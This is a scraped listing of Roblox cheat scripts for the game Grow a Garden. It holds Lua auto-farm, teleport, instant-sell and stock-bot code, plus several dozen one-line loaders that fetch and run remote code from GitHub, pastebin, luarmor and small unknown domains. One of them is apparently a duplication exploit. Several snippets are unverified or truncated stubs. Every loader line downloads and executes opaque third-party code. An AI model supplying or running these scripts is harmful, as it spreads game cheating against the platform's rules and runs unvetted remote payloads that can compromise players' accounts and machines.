Free precise calculation tools for optimizing your Grow A Garden experience! π
The ultimate Roblox script collection - 81 curated scripts to enhance your gaming experience!
getgenv().AutoFarm = true
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local VirtualInputManager = game:GetService("VirtualInputManager")
local lplr = Players.LocalPlayer
local remote = ReplicatedStorage:WaitForChild("GameEvents"):WaitForChild("SummerHarvestRemoteEvent")
local function getHumanoidRootPart()
local char = lplr.Character
if char and char:FindFirstChild("HumanoidRootPart") then
return char.HumanoidRootPart
end
return nil
end
local function teleportTo(position)
local hrp = getHumanoidRootPart()
if hrp then
hrp.CFrame = CFrame.new(position)
end
end
local function spamEUntilFruitGone(fruit)
if not fruit or not fruit.PrimaryPart then
return
end
local fruitExists = true
local conn
conn = fruit.AncestryChanged:Connect(function(_, parent)
if not parent then
fruitExists = false
conn:Disconnect()
end
end)
while fruitExists and getgenv().AutoFarm do
local ok, err = pcall(function()
VirtualInputManager:SendKeyEvent(true, Enum.KeyCode.E, false, game)
wait(0.05)
VirtualInputManager:SendKeyEvent(false, Enum.KeyCode.E, false, game)
end)
if not ok then
warn("Error when spamming E key: " .. tostring(err))
break
end
wait(0.2)
end
end
local function getOwnedFarms()
local farms = {}
local FarmObjects = workspace:WaitForChild("Farm"):GetChildren()
for _, farm in ipairs(FarmObjects) do
local success, isOwned = pcall(function()
return farm.Important.Data.Owner.Value == lplr.Name
end)
if success and isOwned then
table.insert(farms, farm)
end
end
return farms
end
local function getPlantsFromFarm(farm)
local plants = {}
local plantsFolder = farm.Important:FindFirstChild("Plants_Physical")
if plantsFolder then
for _, plant in ipairs(plantsFolder:GetChildren()) do
if plant:IsA("Model") then
table.insert(plants, plant)
end
end
end
return plants
end
local function getFruitsFromPlant(plant)
local fruits = {}
local fruitsFolder = plant:FindFirstChild("Fruits")
if fruitsFolder then
for _, fruit in ipairs(fruitsFolder:GetChildren()) do
if fruit:IsA("Model") and fruit.PrimaryPart then
table.insert(fruits, fruit)
end
end
end
return fruits
end
local function isWithinFirstTenMinutes()
local time = os.date("*t")
return time.min >= 0 and time.min < 10
end
local function pauseFunction()
local hrp = getHumanoidRootPart()
if hrp then
hrp.CFrame = CFrame.new(-116.40152, 4.40001249, -12.4976292, 0.871914983, 0, 0.489657342, 0, 1, 0, -0.489657342, 0, 0.871914983)
end
remote:FireServer("SubmitAllPlants")
end
task.spawn(function()
while true do
getgenv().sh = isWithinFirstTenMinutes()
wait(5)
end
end)
task.spawn(function()
while true do
if getgenv().AutoFarm and getgenv().sh then
local hrp = getHumanoidRootPart()
if not hrp then
wait(3)
else
local farms = getOwnedFarms()
if #farms == 0 then
wait(5)
else
for _, farm in ipairs(farms) do
local plants = getPlantsFromFarm(farm)
for _, plant in ipairs(plants) do
local fruits = getFruitsFromPlant(plant)
for _, fruit in ipairs(fruits) do
if not getgenv().AutoFarm or not getgenv().sh then break end
if fruit and fruit.Name == "Tomato" and fruit.PrimaryPart then
teleportTo(fruit.PrimaryPart.Position)
wait(0.1)
spamEUntilFruitGone(fruit)
end
end
if not getgenv().AutoFarm or not getgenv().sh then break end
end
end
end
end
wait(25)
for i = 1, 5 do
if not getgenv().AutoFarm then break end
pauseFunction()
wait(1)
end
else
wait(1)
end
end
end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Ayvathion/AV-On-Top/refs/heads/main/Loader.lua"))()
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/7d8a2a1a9a562a403b52532e58a14065.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/yue-os/script/refs/heads/main/Y-Hub"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/ThundarZ/Welcome/refs/heads/main/Main/GaG/Main.lua'))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/greywaterstill/GAG/refs/heads/main/nathub.lua"))()
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/b778b0425fce68591d34cc9d0a04fe3b.lua"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/frvaunted/Main/refs/heads/main/Alter%20Hub'))()
repeat wait() until game:IsLoaded() and game.Players.LocalPlayer
local scripts = {
[126884695634066] = "https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/Garden/Garden-V1.lua",
[81440632616906] = "https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/DigEarth/V1.lua",
}
local url = scripts[game.PlaceId]
if url then
loadstring(game:HttpGetAsync(url))()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/untitled.lua"))()
end
local plr = game:GetService("Players").LocalPlayer
local rs = game:GetService("ReplicatedStorage")
local sellPos = CFrame.new(90.08035, 0.98381, 3.02662, 6e-05, 1e-06, 1, -0.0349, 0.999, 1e-06, -0.999, -0.0349, 6e-05)
local gui = Instance.new("ScreenGui", game.CoreGui)
gui.ResetOnSpawn = false
local f = Instance.new("Frame", gui)
f.Size = UDim2.fromOffset(160, 110)
f.Position = UDim2.new(0.5, -80, 0.6, -55)
f.BackgroundColor3 = Color3.fromRGB(235, 64, 52)
f.Active, f.Draggable = true, true
Instance.new("UICorner", f).CornerRadius = UDim.new(0, 10)
local lbl = Instance.new("TextLabel", f)
lbl.Size = UDim2.new(1, 0, 0.25, 0)
lbl.BackgroundTransparency = 1
lbl.Text = "SheScripts Gag"
lbl.TextColor3 = Color3.new(1, 1, 1)
lbl.Font = Enum.Font.GothamBold
lbl.TextScaled = true
local function makeButton(text, y)
local b = Instance.new("TextButton", f)
b.Size = UDim2.new(0.85, 0, 0.3, 0)
b.Position = UDim2.new(0.075, 0, y, 0)
b.BackgroundColor3 = Color3.fromRGB(255, 214, 10)
b.Text = text
b.TextColor3 = Color3.new(0, 0, 0)
b.Font = Enum.Font.GothamSemibold
b.TextScaled = true
Instance.new("UICorner", b).CornerRadius = UDim.new(0, 6)
return b
end
local btnAll = makeButton("Sell Inventory", 0.35)
local btnHand = makeButton("Sell item in hand", 0.68)
btnAll.MouseButton1Click:Connect(function()
local hrp = plr.Character and plr.Character:FindFirstChild("HumanoidRootPart")
if hrp then
local orig = hrp.CFrame
hrp.CFrame = sellPos
task.wait(0.1)
rs.GameEvents.Sell_Inventory:FireServer()
task.wait(0.1)
hrp.CFrame = orig
end
end)
btnHand.MouseButton1Click:Connect(function()
local hrp = plr.Character and plr.Character:FindFirstChild("HumanoidRootPart")
if hrp then
local orig = hrp.CFrame
hrp.CFrame = sellPos
task.wait(0.1)
rs.GameEvents.Sell_Item:FireServer()
task.wait(0.1)
hrp.CFrame = orig
end
end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Nebula-xyzs/GAG/refs/heads/main/GrowAGardenXE"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/MoziIOnTop/MoziIHub/refs/heads/main/GrowaGarden"))()
loadstring(game:HttpGet('https://pandahub.website/scripts/loader.lua'))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ArdyBotzz/NatHub/refs/heads/master/NatHub.lua"))();
loadstring(game:HttpGet("https://raw.githubusercontent.com/sudaisontopxd/PanScriptXSudaisScript/refs/heads/main/PhantFluxReal.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Loolybooly/TheVaultScripts/refs/heads/main/FullScript"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/H4xScripts/Loader/refs/heads/main/loader2.lua"))()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/Loader/LoaderV1.lua"))()
_G.AutoFarm = true
_G.PerformanceMode = "Fast" -- "LowEnd", "Normal", "Fast", "Ultra"
_G.TeleportCooldown = 0.1
-- Seed settings
_G.AutoRebuy = true
_G.SeedPrice = 4000
_G.AutoSellThreshold = 50
_G.AutoWatering = true
_G.AutoSprinklers = true
-- Gear shop
_G.GearShopAutoBuy = true
_G.GearShopItems = {"Basic Watering Can", "Basic Sprinkler", "Basic Shovel"}
_G.RenderDistance = 50
_G.UIUpdateInterval = 2
_G.OptimizeRendering = true
loadstring(game:HttpGet("https://raw.githubusercontent.com/debunked69/solixloader/refs/heads/main/solix%20v2%20new%20loader.lua"))()
loadstring(game:HttpGet("https://pastebin.com/raw/XHMN2zpp"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Kenniel123/Grow-a-garden/refs/heads/main/Grow%20A%20Garden"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/thantzy/thanhub/refs/heads/main/thanv1"))()
loadstring(game:HttpGet("https://get.nathub.xyz/loader"))()
loadstring(game:HttpGet("https://rifton.top/loader.lua"))()
loadstring(game:HttpGet("https://pastebin.com/raw/90r2yXNi"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Bern0va/Scripts/refs/heads/main/gag-dupe.lua"))()
loadstring(game:HttpGet("https://lunor.dev/loader"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/Rayfield/Rayfield/main/Loader.lua'))()
loadstring(game:HttpGet(('https://pastefy.app/P5CQPKQ2/raw'),true))()
getgenv().Configs = {
["Stack Plant"] = true,
["Low Cpu"] = true,
["Webhook"] = "Url Here"
}
loadstring(game:HttpGet("https://api.realaya.xyz/v1/files/l/yqx3a5r6t4oj1o0lbx14nutwl4sc97bq.lua"))();
repeat wait() until game:IsLoaded() and game.Players.LocalPlayer
getgenv().Team = "Pirates" -- Marines
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/e0c7fcf6c077fc23475cf4ce4db58e42.lua"))()
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/255ac567ced3dcb9e69aa7e44c423f19.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/nootmaus/GrowAAGarden/refs/heads/main/mauscripts"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Skzuppy/forge-hub/main/loader.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Skibidiking123/Fisch1/refs/heads/main/FischMain"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Dex-Bear/Vxezehub/refs/heads/main/VxezeHubMain"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/M-E-N-A-C-E/Menace-Hub/refs/heads/main/Old%20Server%20Finder%20Grow%20a%20Garden", true))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/tesghg/Grow-a-Garden/main/ameicaa_Grow_A_Garden.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/kosowa/asd/refs/heads/main/GaG.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))()
loadstring(game:HttpGet("https://nicuse.xyz/MainHub.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/nf-36/Koronis/refs/heads/main/Scripts/Loader.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/BrySadW/GrowAGarden/refs/heads/main/GrowAGarden.lua"))()
loadstring(game:HttpGet("https://getsomber.com/loader.lua"))()
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f14c1806369f8ae3db39eafc954d76d.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xQuartyx/QuartyzScript/main/Loader.lua"))()
-- π 1ST SCRIPTπ
loadstring(game:HttpGet("https://raw.githubusercontent.com/Kenniel123/Grow-a-garden/refs/heads/main/Grow%20A%20Garden"))()
-- π 2ND SCRIPTπ
loadstring(game:HttpGet("https://raw.githubusercontent.com/Kenniel123/Grow-a-garden/refs/heads/main/Grow%20A%20Garden"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/FemWareDevelper/Universal/refs/heads/main/Garden"))()
local G = loadstring(game:HttpGet("https://raw.githubusercontent.com/Bwhw827g29wh/Scripts/refs/heads/main/FetchAndExecute.lua"))()
G:fetchAndExecute("https://raw.githubusercontent.com/Bwhw827g29wh/Scripts/refs/heads/main/GGH-Grow-a-Garden.lua")
loadstring(game:HttpGet("https://gitlab.com/Lmy77/menu/-/raw/main/infinityx"))()
loadstring(game:HttpGet('https://lunor.dev/loader'))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ameicaa1/Grow-a-Garden/main/Grow_A_Garden.lua"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/ago106/SpaceHub/refs/heads/main/Multi'))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/NittarPP/PhotonScript/refs/heads/main/Loading/Loading.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/doggoman230/growagarden/refs/heads/main/script"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hakariqScripts/Roslina/refs/heads/main/Ro"))()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/depthso/Grow-a-Garden/refs/heads/main/autofarm.lua')))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/gumanba/Scripts/refs/heads/main/GrowaGarden", true))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/gumanba/Scripts/main/GrowaGarden"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/checkurasshole/Script/refs/heads/main/IQ'))();
loadstring(game:HttpGet("https://raw.githubusercontent.com/n3xkxp3rl/Moma-Hub/refs/heads/main/GrowAGarden.lua"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/H4xScripts/Scripts/refs/heads/main/lod.lua'))()
loadstring(game:HttpGet("https://rscripts.net/raw/grow-a-garden-open-source_1748247986626_MBvq210X08.txt",true))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Dingarik/Dingarik/refs/heads/main/GrowAGarden"))()
loadstring(game:HttpGet("https://rawscripts.net/raw/Grow-a-Garden-NoLag-Hub-no-key-38699"))()
script_key="keyhere";
(loadstring or load)(game:HttpGet("https://getnative.cc/script/loader"))()
loadstring(game:HttpGet("https://lumin-hub.lol/loader.lua",true))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Thebestofhack123/2.0/refs/heads/main/Scripts/OldJoiner", true))() print("questions? - discord")
loadstring(game:HttpGet("https://raw.githubusercontent.com/ameicaa1/Grow-a-Garden/main/CandyBlossom_Farm.lua"))()
loadstring(game:HttpGet("https://pastefy.app/QAOdVEuB/raw"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/growgardenscript/autogetcandyblossom/refs/heads/main/autofindcandyblossomserver"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/m00ndiety/Grow-a-garden/refs/heads/main/Grow-A-fkin-Garden.txt'))()
loadstring(game:HttpGet(request({Url='https://aussie.productions/script'}).Body))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Skzuppy/forge-hub/main/loader.lua"))()
local Rayfield = loadstring(game:HttpGet('https://raw.githubusercontent.com/shlexware/Rayfield/main/source'))()
-- Configure Rayfield UI here
local Rayfield = loadstring(game:HttpGet('https://raw.githubusercontent.com/shlexware/Rayfield/main/source'))()
Rayfield:Notify({
Title = "Notification!",
Content = "FOLLOW MY TIKTOK @eroexy",
Duration = 2.5,
})
local Window = Rayfield:CreateWindow({
Name = "uro's GAG script",
LoadingTitle = "Grow a Garden",
LoadingSubtitle = "by uro",
Theme = "Default",
KeySystem = true,
KeySettings = {
Title = "Get the key pal",
Subtitle = "Key System",
Note = "Don't download anything",
GrabKeyFromSite = true,
Key = {"https://linkvertise.com/..."}
}
})
local Tab = Window:CreateTab("Farm π₯", nil)
local Button = Tab:CreateButton({
Name = "auto farm",
Callback = function() end,
})
local Button = Tab:CreateButton({
Name = "auto plant",
Callback = function() end,
})
local Rayfield = loadstring(game:HttpGet('https://raw.githubusercontent.com/shlexware/Rayfield/main/source'))()
local Window = Rayfield:CreateWindow({
Name = "Grow A Garden | tekitaway",
LoadingTitle = "Grow A Garden",
LoadingSubtitle = "by tekitaway",
Theme = "Green",
ConfigurationSaving = { Enabled = false },
Discord = { Enabled = false },
KeySystem = false,
})
local MainTab = Window:CreateTab("Selling", nil)
-- Add your functions here (e.g., auto-farm, auto-sell)
loadstring(game:HttpGet("https://raw.githubusercontent.com/ZusumeHub/ZusumeHub/refs/heads/main/GAg5"))()
loadstring(game:HttpGet("https://paste.ee/r/l4hSf64H"))()
repeat wait() until game:IsLoaded() and game.Players.LocalPlayer
local scripts = {
[126884695634066] = "https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/Garden/Garden-V1.lua",
[81440632616906] = "https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/DigEarth/V1.lua",
}
local url = scripts[game.PlaceId]
if url then
loadstring(game:HttpGetAsync(url))()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/NoLag-id/No-Lag-HUB/refs/heads/main/untitled.lua"))()
end
--[[
@author depso (depthso)
@description Grow a Garden stock bot script
https://www.roblox.com/games/126884695634066
]]
type table = {
[any]: any
}
_G.Configuration = {
--// Reporting
["Enabled"] = true,
["Webhook"] = "https://discord.com/api/webhooks.....", -- replace with your webhook url
["Weather Reporting"] = true,
--// User
["Anti-AFK"] = true,
["Auto-Reconnect"] = true,
["Rendering Enabled"] = false,
--// Embeds
["AlertLayouts"] = {
["Weather"] = {
EmbedColor = Color3.fromRGB(42, 109, 255),
},
["SeedsAndGears"] = {
EmbedColor = Color3.fromRGB(56, 238, 23),
Layout = {
["ROOT/SeedStock/Stocks"] = "SEEDS STOCK",
["ROOT/GearStock/Stocks"] = "GEAR STOCK"
}
},
["EventShop"] = {
EmbedColor = Color3.fromRGB(212, 42, 255),
Layout = {
["ROOT/EventShopStock/Stocks"] = "EVENT STOCK"
}
},
["Eggs"] = {
EmbedColor = Color3.fromRGB(251, 255, 14),
Layout = {
["ROOT/PetEggStock/Stocks"] = "EGG STOCK"
}
},
["CosmeticStock"] = {
EmbedColor = Color3.fromRGB(255, 106, 42),
Layout = {
["ROOT/CosmeticStock/ItemStocks"] = "COSMETIC ITEMS STOCK"
}
}
}
}
--// Services
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local VirtualUser = cloneref(game:GetService("VirtualUser"))
local RunService = game:GetService("RunService")
local GuiService = game:GetService("GuiService")
--// Remotes
local DataStream = ReplicatedStorage.GameEvents.DataStream -- RemoteEvent
local WeatherEventStarted = ReplicatedStorage.GameEvents.WeatherEventStarted -- RemoteEvent
local LocalPlayer = Players.LocalPlayer
local function GetConfigValue(Key: string)
return _G.Configuration[Key]
end
--// Set rendering enabled
local Rendering = GetConfigValue("Rendering Enabled")
RunService:Set3dRenderingEnabled(Rendering)
--// Check if the script is already running
if _G.StockBot then return end
_G.StockBot = true
-- Rest of the script continues...
--[[
WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
]]
local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local UserInputService = game:GetService("UserInputService")
local fruitNames = {"apple", "cactus", "candy blossom", "coconut", "dragon fruit", "easter egg", "grape", "mango", "peach", "pineapple", "blue berry"}
local activeTweens = {}
local function createRainbowTween(label)
local colors = {
Color3.new(1, 0, 0),
Color3.new(1, 0.5, 0),
Color3.new(1, 1, 0),
Color3.new(0, 1, 0),
Color3.new(0, 0, 1),
Color3.new(0.5, 0, 1),
Color3.new(1, 0, 1)
}
local tweenInfo = TweenInfo.new(1, Enum.EasingStyle.Linear)
if activeTweens[label] then
activeTweens[label]:Cancel()
activeTweens[label] = nil
end
spawn(function()
while true do
for _, color in ipairs(colors) do
local tween = TweenService:Create(label, tweenInfo, {TextColor3 = color})
activeTweens[label] = tween
tween:Play()
tween.Completed:Wait()
end
end
end)
end
-- Rest of the OP script continues...